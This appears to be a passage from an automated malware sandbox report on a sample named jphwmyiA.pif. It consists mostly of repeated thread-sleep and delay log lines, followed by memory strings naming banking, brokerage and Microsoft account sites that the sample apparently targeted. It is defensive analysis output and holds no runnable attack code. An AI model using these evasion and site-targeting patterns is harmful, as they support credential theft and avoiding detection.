                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595785s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595616s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595402s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595238s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595083s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594956s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594812s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594685s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594560s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594445s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594335s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594226s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594116s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -594007s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593897s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593782s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593663s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593554s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593444s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593335s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593226s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593108s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -593007s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592897s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592788s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592679s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592569s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592460s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592349s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -592226s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep count: 33 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -30437127721620741s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8112Thread sleep count: 7034 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8112Thread sleep count: 2787 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599779s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599672s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599563s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599344s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599125s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -599016s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598906s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598797s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598686s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598469s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598250s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598141s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -598016s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597725s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597588s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597481s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597375s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597266s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597156s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -597047s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596933s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596828s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596719s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596594s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596485s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596360s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596235s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -596110s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595985s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595860s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595735s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595610s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595485s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595360s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595235s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -595110s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594938s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594788s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594672s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594562s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594453s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594344s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594234s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594125s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -594016s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 8108Thread sleep time: -593891s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,7_2_027B58B4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599525Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599269Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598838Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598679Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598572Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597869Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597750Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597530Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596839Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596491Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596070Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595371Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595258Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595142Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594918Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594805Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594698Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594586Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594463Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594337Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594003Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593708Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593261Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593086Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592951Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592608Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592266Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592130Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592016Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591890Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591751Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599890
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599780
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599670
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599539
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599339
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599219
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599094
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598984
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598875
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598765
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598656
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598547
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598437
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598327
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598218
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598057
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597933
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597816
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597695
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597565
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597438
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597316
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597196
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597023
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596688
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596526
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596352
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596245
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596071
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595927
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595785
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595616
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595402
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595083
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594956
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594812
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594685
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594445
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594335
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594116
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594007
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593897
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593782
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593663
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593554
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593444
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593335
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593108
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593007
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592897
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592679
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592569
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592349
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599891
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599779
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599672
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599563
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599344
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599125
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598906
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598797
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598686
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598578
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598469
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598359
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598141
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597725
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597481
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597375
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597266
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597156
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597047
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596933
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596828
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596719
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596594
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596485
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596360
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596235
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596110
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595985
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595860
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595735
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595610
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595485
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595360
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595235
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595110
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594672
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594562
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594453
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594344
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594234
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594125
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593891
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: jphwmyiA.pif, 0000000A.00000002.3756955168.000000001F2D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^ W
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
